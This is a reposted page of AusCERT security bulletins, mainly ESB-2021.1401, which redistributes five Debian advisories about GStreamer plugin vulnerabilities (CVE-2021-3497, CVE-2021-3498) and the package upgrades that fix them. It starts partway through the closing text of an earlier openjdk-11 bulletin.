NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYIZieuNLKJtyKPYoAQjGEg//eFzD/EFMzQGT8NsOZzkrQlZlqnBHeIEd
ENj5OtB7YL0QKFWTYVm7aTuCnNL8y/VD2vSzqdk6ovJHBtQNnYb6ImBHrUmRaumA
Xo0IzuzFkdEAAQMSc4udKKz+uJ2nJBbHSsseHl31b2rDkiOoqNd0FpfnIljKvOE3
Iopldj6Zf1o17PBECrQt1AKBEY3UrK+GDii/b4uMxCkElYqKkxQPJYx35/h7RiX1
KEt/4XBbTj1QmxXVZOy+tQzfzpoXGYDfQuggfz61mORQE7tpbypULHmBvDjtQzPT
wjbXjJYcOjMtoEVW4xYe0tOju54ys8TDqsErtLO0AeseOhsNyLEUgQr6tmwj5x8Y
wWna2OwMyJ8GyPmA3k8Swh/GkkemMCXcgL1q+Fbt1uhe89m79tS5PQm7rXcWdsxS
1lMHQcAJ1ziUDXx9asEhrAr8UsaVixOX86VNH7FsBKgTnZ6PPhsTUpVUEvV8SFQa
MEuTDcsaZHz7NBXbPU0mwzrHUPySFg+dmpI7KA0moWdGRlhrxJu0Y8Dh1Y/eTQ4u
hOx7jKG3jd9bfqicNnCF09V5ELUah4fu3qR8WS5J20twJ3jXwjtyjq9Dgxt2PAGv
neVydzMrpcVy7dbce8LyNTKHm+Ac2re05v3scPUeCGNWQI5Hb4FJ1D2fIPYsTrGu
9cH1aOJWaPo=
=jAuI
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1400 – [Debian] openjdk-11: Multiple vulnerabilities appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/esb-2021-1400-debian-openjdk-11-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1400-debian-openjdk-11-multiple-vulnerabilities

ESB-2021.1401 – [Win][UNIX/Linux][Debian] gst plugins: Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1401
gst plugins security update
26 April 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: gst-plugins-good1.0
gst-libav1.0
gst-plugins-bad1.0
gst-plugins-base1.0
gst-plugins-ugly1.0
Publisher: Debian
Operating System: Debian GNU/Linux
UNIX variants (UNIX, Linux, OSX)
Windows
Impact/Access: Execute Arbitrary Code/Commands — Unknown/Unspecified
Denial of Service — Unknown/Unspecified
Resolution: Patch/Upgrade
CVE Names: CVE-2021-3498 CVE-2021-3497

Original Bulletin:
http://www.debian.org/security/2021/dsa-4900
http://www.debian.org/security/2021/dsa-4901
http://www.debian.org/security/2021/dsa-4902
http://www.debian.org/security/2021/dsa-4903
http://www.debian.org/security/2021/dsa-4904

Comment: This bulletin contains five (5) Debian security advisories.

This advisory references vulnerabilities in products which run on
platforms other than Debian. It is recommended that administrators
running gst-plugins-good1.0 check for an updated version of the
software for their operating system.

– ————————–BEGIN INCLUDED TEXT——————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA512

– – ————————————————————————-
Debian Security Advisory DSA-4900-1 security@debian.org
https://www.debian.org/security/ Moritz Muehlenhoff
April 24, 2021 https://www.debian.org/security/faq
– – ————————————————————————-

Package : gst-plugins-good1.0
CVE ID : CVE-2021-3497 CVE-2021-3498
Debian Bug : 986910 986911

Multiple vulnerabilities were discovered in plugins for the GStreamer
media framework, which may result in denial of service or potentially
the execution of arbitrary code if a malformed media file is opened.

For the stable distribution (buster), these problems have been fixed in
version 1.14.4-1+deb10u1.

We recommend that you upgrade your gst-plugins-good1.0 packages.

For the detailed security status of gst-plugins-good1.0 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/gst-plugins-good1.0

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
– —–BEGIN PGP SIGNATURE—–

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmCEWIcACgkQEMKTtsN8
TjbW8w//a6Dd89UeOr11s1KBa/kzGCk8556jYBzjUAWVz1zsRMlS+hrhA+pIGSOw
oohu5FjbeRgBf+aQ4Yt/hqmoE/YK55pvpS/PYRqcrwN+GB6BOvIWtTNGBKk+PBYQ
3yYSs6yIoJYsQuBK6Mx3scOb4zlvYMocC8uLa3m+DyUatyUzeOr8pexanS2asg51
FLSpdYD68/uNwRzsb3WdnzdksOavvwBxj+BJBPtQgXlKczebrKQfwYuWDPfLrTQ8
qG+PqLdtEe5WE0dkkGgRS0JPWtRy1IqT2zwoevVbCt833eXLYzub5LPJubjw1z8s
5m6/G1u6waeLPCDyrOb+ytWpM0792abFbnONN8vqXb3Qym96HHtX9v6zL39khUvb
s5aSwVHGllPMcLp3n5KdOLoF3dmfh8pjbjqYra91ER4iC/69ETcnBAj19EoaeOMv
l3GKpaOG+7M7m3uVPs+tuktnxdO66zhz0Q34uUCkz2QUY5IDm69ItLf+/Nlr7pmo
kbTsyET8sVexvleusvagrPfnxDYgisKf4FLFSh2kcX84qY/oIMy3+TLFBRoYtrfk
+kFyrC9zBJ6ypRF73jfMADjmzQAAtGF0KRhYVRz+J4FFxIdFsJKFoD9VQOGgeo/1
ozhUqZlxaqcjmjjKKn9sN0jh+6dDazfSWth6+f0DvmY49sOwf64=
=o26I
– —–END PGP SIGNATURE—–

– ——————————————————————————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA512

– – ————————————————————————-
Debian Security Advisory DSA-4901-1 security@debian.org
https://www.debian.org/security/ Moritz Muehlenhoff
April 24, 2021 https://www.debian.org/security/faq
– – ————————————————————————-

Package : gst-libav1.0
CVE ID : not yet available

Multiple vulnerabilities were discovered in plugins for the GStreamer
media framework, which may result in denial of service or potentially
the execution of arbitrary code if a malformed media file is opened.

For the stable distribution (buster), this problem has been fixed in
version 1.15.0.1+git20180723+db823502-2+deb10u1.

We recommend that you upgrade your gst-libav1.0 packages.

For the detailed security status of gst-libav1.0 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/gst-libav1.0

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
– —–BEGIN PGP SIGNATURE—–

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmCEWIkACgkQEMKTtsN8
Tja1wRAApaFYfJxyCR46nV/MBRUsGlShmGs9FfGhaeNC0O91RkIX/bU+HX0hsCVc
2CE2LPBDtrEFfe7O1rtOSdS6Ip0FyRuYCCYe7bx1/4AgRLkYWc/j/NklMp39UjxM
wQmKQGMNqTqD8ktuP/Kuh6ZNuCeAQg3UGXlJ+DXz9UpY9jNUTG80SxvRFo3Drbv9
KteNp98fG5KB4GFZ8T4RjWClZVEUdYBMcoa8vie9rfozR0a3EmLZA9qYHffaJA1t
OMyYEluJuol57U78jFd6A2wKsrD0XnmD6Lmf+gDQ0NdF+lNqigV2bGJ09gbP49KG
VJybMiaor9jQbxa4Cq21gofZ75rGinSRsEs8yITTBOu23r1cFR68+nRxfzzjZHhc
6OTs/LBSJiA3PuDTNbRZQ17dpQp1KfgVQ51KzYtuD9dhSNUG3ZRBDK4MX/gcQOA1
jX442mpIUxf2la3J1wadIeHeTb6XixvIsUN58l07LA8HEY+ElxS+xd/x/AXyN4Fu
MF/AqjSP6lKn64eLBsNsOQmo2oHEH17tCZhCEuRAArQtkWYZ7MnpKcp/w6iXj36N
1wkIb0ib6cEPhNemUi1AXlY9cOkt+aicmzvxNaJjwwCWnyGBoI90njzBDsavbmbY
VywLOrXW4v/y3pvUW1m8QgSJ2/tyaLKK+MgpoP6YIt7aO63fiZ0=
=cK2V
– —–END PGP SIGNATURE—–

– ——————————————————————————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA512

– – ————————————————————————-
Debian Security Advisory DSA-4902-1 security@debian.org
https://www.debian.org/security/ Moritz Muehlenhoff
April 24, 2021 https://www.debian.org/security/faq
– – ————————————————————————-

Package : gst-plugins-bad1.0
CVE ID : not yet available

Multiple vulnerabilities were discovered in plugins for the GStreamer
media framework, which may result in denial of service or potentially
the execution of arbitrary code if a malformed media file is opened.

For the stable distribution (buster), this problem has been fixed in
version 1.14.4-1+deb10u2.

We recommend that you upgrade your gst-plugins-bad1.0 packages.

For the detailed security status of gst-plugins-bad1.0 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/gst-plugins-bad1.0

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
– —–BEGIN PGP SIGNATURE—–

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmCEWIsACgkQEMKTtsN8
Tjbfcg/9G18OmmDDgbM1NF73LOM2+TT/x3fXNPU1va+URzBNCkpcSe3quA6rBhzJ
it5N41V5Zz7cWC6wahwZLIZWMNhqk8D56gM5Xv19cZPFGEnwrvbXrWzukNRW65M7
e2TY/ZFU4U+AOZEEqrgIrqczXaS/xK/iJ/WUEx0mgmfaQPRCNWQ+R8DHpv+Xcf49
cC0onn1gD4g27O02Fz93JRL3XJ5KvSNNoKDguk9ZiE0vHW7BOvpURFrMrR/DADoK
jbQn8DiMI8tfD086Ws16fLbddNqdDE4n5QXZcPVnz0zZo/HN/7L+zTEMS20mediK
jD+tmeAj4O5cTXcEhm6XsrISI52hsPs3t/qFFXQTjE8sfE/Ra2DMwq6PQY3oln3g
amASe/cK9cSaEPKsBYLGf2uOnj2QM7oZRM+sh4N+9M9MF/wdwJFFmYp4kFGMgTW6
Jmwa9njIxA7U7CHtdl5Kp+K6fcsoKeEU71ssYEjxM/qz33wWmhdi1xPNxCvAGYRy
1+GpLSF6M+U09Z6bX+cj4EFsHAwwQwlshw2fn7YkP43xQPZ77beJ4JbZaxBUBkBQ
0wA2TnWlllerJK9zZonH7/hv2Gsbga5s2Ivzrn0i2+p2IB3QUfKYVL7XpCkcahpL
Q6aS9JzA/1SMpWKPWWZEtqARGzeURDgSncRj+LOo9OISqSiC00A=
=mons
– —–END PGP SIGNATURE—–

– ——————————————————————————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA512

– – ————————————————————————-
Debian Security Advisory DSA-4903-1 security@debian.org
https://www.debian.org/security/ Moritz Muehlenhoff
April 24, 2021 https://www.debian.org/security/faq
– – ————————————————————————-

Package : gst-plugins-base1.0
CVE ID : not yet available

Multiple vulnerabilities were discovered in plugins for the GStreamer
media framework, which may result in denial of service or potentially
the execution of arbitrary code if a malformed media file is opened.

For the stable distribution (buster), this problem has been fixed in
version 1.14.4-2+deb10u1.

We recommend that you upgrade your gst-plugins-base1.0 packages.

For the detailed security status of gst-plugins-base1.0 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/gst-plugins-base1.0

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
– —–BEGIN PGP SIGNATURE—–

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmCEWI0ACgkQEMKTtsN8
Tja79A//fg7U026ajaNK8Sm7C3IJ/cODOjiR7YzP3An8cSSVqUnS4hpOzyQADvus
Kv1MwhoLHvT5ooG4y8aHmBf6cMHc/08xlpZYwxpaQv26EETtNOsUbBrOc3U8EPwW
K39PLa/aTVr6x/W10POg3MjWR7/FNLWgzu3jpplp6KFHtlUc/KiunrSIhbdB5wU4
y3cm2l11gY5yi4eqFe//3zmR5CrwJdShM7zq+62xKpdJX4sx0qnMUUCpCb8PlPTA
ZXasvg3ImPoQMoaONxB0pfExwQ5Gu/Tf5yVW14notWe0mFsKsgTOfiwA+ufmhi+4
l6Z6K7LKmsHSr+DNbEjfO2gnF5BfSauXrGhgz+k1EmBTxwThP689Wj7n0bfkB2kZ
a9gh4hXo0zka7R10cUjhyCU8bY7J7SuO/BAv/FfsdniRHj7hPA6JJIZflsuLRWgi
a08b48j1FSPKqIoimgixGjPns8fnqWOC0a+rCk4k+rKu+jDBQy00+oQXI3IpYHD5
f0YrEOieQNlViv70ajWZzyUzxXEPwzsuz8dfMjBXR1p5mMY2AmBZdBmnwSB6KTB/
voRp7KG5LLiRQCuJe77CqqW1+rxCRTuZwaW5n54JGbX7qyixTVr1xJT7z0sqjEmY
+cpMwU+mZZNS+hmfO7xleIvx3hbvzCJbcI0jik8yTiV+1OLKuTA=
=TU+u
– —–END PGP SIGNATURE—–

– ——————————————————————————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA512

– – ————————————————————————-
Debian Security Advisory DSA-4904-1 security@debian.org
https://www.debian.org/security/ Moritz Muehlenhoff
April 24, 2021 https://www.debian.org/security/faq
– – ————————————————————————-

Package : gst-plugins-ugly1.0
CVE ID : not yet available

Multiple vulnerabilities were discovered in plugins for the GStreamer
media framework, which may result in denial of service or potentially
the execution of arbitrary code if a malformed media file is opened.

For the stable distribution (buster), this problem has been fixed in
version 1.14.4-1+deb10u1.

We recommend that you upgrade your gst-plugins-ugly1.0 packages.

For the detailed security status of gst-plugins-ugly1.0 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/gst-plugins-ugly1.0

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
– —–BEGIN PGP SIGNATURE—–

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmCEWI8ACgkQEMKTtsN8
TjZ+JBAArLyoBXnX0qMaEMwNNMQENqxQZQL1gfFW+RbUcMal4LQIRTqdwliqMHTO
9dGEV58hg1yH/4Xja/hKSCTieNvTRLVWGWxIgQ5y2HazBPhmKQdf6ERFGRCqHG3g
SsN01jFgA5yS6/14rDDydO/DDTFR/R+YvS+RQySSJ69P/VqOpc8keb1pHpUxktwG
LfnJ+09JyzZcw1r1VmioJt1UJVSy7e/OzN3hZ/AADiZfZxPJX8zE6rGzaMxk7nlk
dCdh4THXa77ha/CSTIc+kZBoh4GM6BUYtFD2glpvYArNCB39ik/3mG7P8cho6sFg
K0/VYI13tlpzuCU6rFwdJipw4PU3IWqXd3Rc+y8XvC0J/SFgHizyThMK7H8HwYCd
rA71Y7uLElpu50TXoxNPPusYsFT9Ps6PEgn4IcmmDZR0dMRNNFHz16Qrz3FoAoEI
oOZzwRqMoJVy2TqKpOYU9CuxLJ5UVs96yflNrMxpGvFB2AmyDNSkZ3/UqTVhiJcv
hUS4fOleDu38/v3bpAMcpqEgsPSYwFWtoe3XpESB6BxzamkaO1KVqR0qQ0cIkRQW
rSXAtz47YA3ykGSpHN9Al8PLFm80OuakGEhUS/2z0Fe8xoUI7csM4XanpIcQoX08
mHTsevGVrQyi9rHRXsxWAvtMUNTiEoizrHHmPeUu3dO/eZADKwo=
=s9Jz
– —–END PGP SIGNATURE—–

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYIZi7eNLKJtyKPYoAQjnrw//TMSBhwnckoH6UBDKhuWhWXMaqm8bP+ek
C+1KXio9S8cieXpabSFX9PYvFruwiGdQTjAAzhf179sWZw4W7KQ7bpKZH0p3HSZE
8Sx7FfXdyxIGvwc34jfLz48lSxshx9rE4M4S/nvF4T0N7/ZFYpFA/jDjjko/wJxg
kTxXbu9J0bLSTp28QG8ndfM6gWGmVqCukWgpK80MpM4u2q9fD1RcL8bcjiRgmUIr
oHDn1GUJHpyVY3zy/dmJXBCt0Iv9kKm2SiPh+PlPDV3kt4CfyziXR+MQSo55hLun
MvIlalDtqOIGnbT6bUvsH7yM6CARyQ1TwjcLdxDdNgRZOOtINeDKpKwf7mFkEkI4
CHDaZdmuXlfj3Cy5W3E4ZX8bRxFfaMCS4J4QAy5g4NQK+y2RH2NG6keznZSW0XC6
tSITlE0vX/NaXPdNUQrfjiS88ChbnIQOgkoF4UvFg5NMsb+6WB6P2i8anBsHbe0x
0VF5xX2yJTkiJJ+FmTrAxSYosxoeIA52CImWHqIhF1brXefwiu8CY0dAnv5xJmOq
SkLyT7iQ6Nz0BsbTQXUNGdBA9RIDbu8tNhkoNNtWbScF9p/aYuMpu6tm2G1q8C1m
BaxMlOuBJGrDB6aE6DGacQo70sCy7VyTrCejqa8prNBj8V0Y+YiYhErE4WXZFJWq
/RYrvfxJ6U4=
=thcP
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1401 – [Win][UNIX/Linux][Debian] gst plugins: Multiple vulnerabilities appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/esb-2021-1401-winunix-linuxdebian-gst-plugins-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1401-winunix-linuxdebian-gst-plugins-multiple-vulnerabilities